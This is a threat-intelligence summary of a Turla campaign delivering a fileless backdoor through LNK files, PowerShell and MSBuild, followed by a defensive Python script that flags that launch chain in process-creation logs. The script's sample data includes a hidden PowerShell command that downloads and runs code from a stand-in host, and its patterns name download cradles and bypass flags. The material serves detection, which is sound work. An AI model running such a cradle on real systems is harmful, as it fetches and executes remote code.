Turla: A Master of Deception
Essential information
- Published
- 08/07/2024 10:45
- Modified
- 08/07/2024 10:55
- Tags
- 2024-07-08 backdoor evasion fileless msbuild powershell snake uroburos
- Related entities
- 10 observables, 1 intrusion set (APT), 7 techniques (MITRE), 2 malware, 1 other
Description
This report details a recent campaign by the Turla threat group that uses malicious Windows shortcut (LNK) files to deliver a fileless backdoor. The attack chain leverages compromised websites, PowerShell scripts, and MSBuild to deploy the payload, which employs several evasion techniques: disabling security features, patching functions in memory, and bypassing AMSI (the Antimalware Scan Interface, which security products use to inspect script content before it runs). The backdoor establishes communication with its command-and-control (C2) servers and can execute additional PowerShell scripts. The analysis also describes the malware's anti-detection mechanisms and its ability to report information back to its operators.
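The chain summarized above (LNK launch, PowerShell, MSBuild loading a project file, fileless payload) leaves a characteristic process-creation trail even when the payload itself never touches disk. The following is an added example, not code from the original report or from the vendor that published it: a small triage script that applies two generic heuristics to Sysmon-style process-creation events. The events, paths and the `example.invalid` URL are constructed for illustration and are not observables from the campaign; the path and flag patterns are general assumptions about what an LNK-to-MSBuild chain looks like, not the report's indicators.

```python
"""Process-creation heuristics for an LNK -> PowerShell -> MSBuild chain.

Added example, not from the original report. All events below are constructed
Sysmon-style (Event ID 1) records, not telemetry from the campaign.
"""
from dataclasses import dataclass
import re


@dataclass
class ProcEvent:
    image: str          # full path of the created process
    cmdline: str        # full command line
    parent_image: str   # full path of the parent process


def basename(path: str) -> str:
    return path.rsplit("\\", 1)[-1].lower()


# Heuristic 1: MSBuild started by a scripting host, or pointed at a project
# file in a user-writable location. Real builds are spawned by IDEs or build
# agents and read project files from source trees, not %TEMP% or %APPDATA%.
SCRIPT_HOSTS = ("powershell.exe", "pwsh.exe", "cmd.exe",
                "wscript.exe", "cscript.exe", "mshta.exe")
USER_WRITABLE = re.compile(
    r"\\(?:Users\\[^\\]+\\AppData|Windows\\Temp|Users\\Public|ProgramData)\\", re.I)
PROJECT_FILE = re.compile(r"\S+\.(?:proj|csproj|vbproj|xml|targets)\b", re.I)


def flag_msbuild(ev: ProcEvent):
    """Return a list of reasons if this MSBuild launch looks abused, else None."""
    if basename(ev.image) != "msbuild.exe":
        return None
    reasons = []
    if basename(ev.parent_image) in SCRIPT_HOSTS:
        reasons.append(f"parent is {basename(ev.parent_image)}")
    m = PROJECT_FILE.search(ev.cmdline)
    if m and USER_WRITABLE.search(m.group(0)):
        reasons.append(f"project file in user-writable path: {m.group(0)}")
    return reasons or None


# Heuristic 2: PowerShell spawned by explorer.exe (what a double-clicked LNK
# produces) with window-hiding or policy-bypass flags, or a download cradle.
SUSPICIOUS_PS_FLAGS = re.compile(
    r"-(?:w(?:indowstyle)?\s+hidden|e(?:nc(?:odedcommand)?)?\s|nop\b|noprofile\b"
    r"|ep\s+bypass|executionpolicy\s+bypass)", re.I)
DOWNLOAD_CRADLE = re.compile(
    r"(?:DownloadString|DownloadFile|Invoke-WebRequest|iwr\s|Net\.WebClient"
    r"|IEX\b|Invoke-Expression)", re.I)


def flag_powershell(ev: ProcEvent):
    """Return a list of reasons if this PowerShell launch looks LNK-driven, else None."""
    if basename(ev.image) not in ("powershell.exe", "pwsh.exe"):
        return None
    reasons = []
    if basename(ev.parent_image) == "explorer.exe" and SUSPICIOUS_PS_FLAGS.search(ev.cmdline):
        reasons.append("explorer-spawned PowerShell with hidden/bypass flags (LNK-style launch)")
    if DOWNLOAD_CRADLE.search(ev.cmdline):
        reasons.append("download cradle in command line")
    return reasons or None


def triage(events):
    """Return (event index, reasons) for every event that trips a heuristic."""
    hits = []
    for i, ev in enumerate(events):
        reasons = (flag_msbuild(ev) or []) + (flag_powershell(ev) or [])
        if reasons:
            hits.append((i, reasons))
    return hits


# Constructed sample: one benign IDE build followed by an LNK-style chain.
SAMPLE_EVENTS = [
    ProcEvent(
        image=r"C:\Program Files\Microsoft Visual Studio\2022\Community\MSBuild\Current\Bin\MSBuild.exe",
        cmdline=r"MSBuild.exe C:\src\app\app.csproj /t:Build",
        parent_image=r"C:\Program Files\Microsoft Visual Studio\2022\Community\Common7\IDE\devenv.exe",
    ),
    ProcEvent(
        image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        cmdline=r"powershell.exe -w hidden -ep bypass -c IEX((New-Object Net.WebClient).DownloadString('http://example.invalid/s'))",
        parent_image=r"C:\Windows\explorer.exe",
    ),
    ProcEvent(
        image=r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
        cmdline=r"MSBuild.exe C:\Users\alice\AppData\Local\Temp\t.xml",
        parent_image=r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
    ),
]

if __name__ == "__main__":
    for idx, reasons in triage(SAMPLE_EVENTS):
        print(idx, "; ".join(reasons))
```

Two caveats for anyone adapting this. First, the in-memory AMSI patch and the other memory patching the report describes produce no process-creation event at all; catching those needs the AMSI ETW provider, script block logging, or an EDR that scans process memory, so these heuristics cover the delivery stage only. Second, the benign first event shows why the rules key on parent process and project-file location rather than on MSBuild itself: MSBuild is a signed Microsoft binary that runs constantly on developer machines, and alerting on its mere presence would bury the one launch that matters.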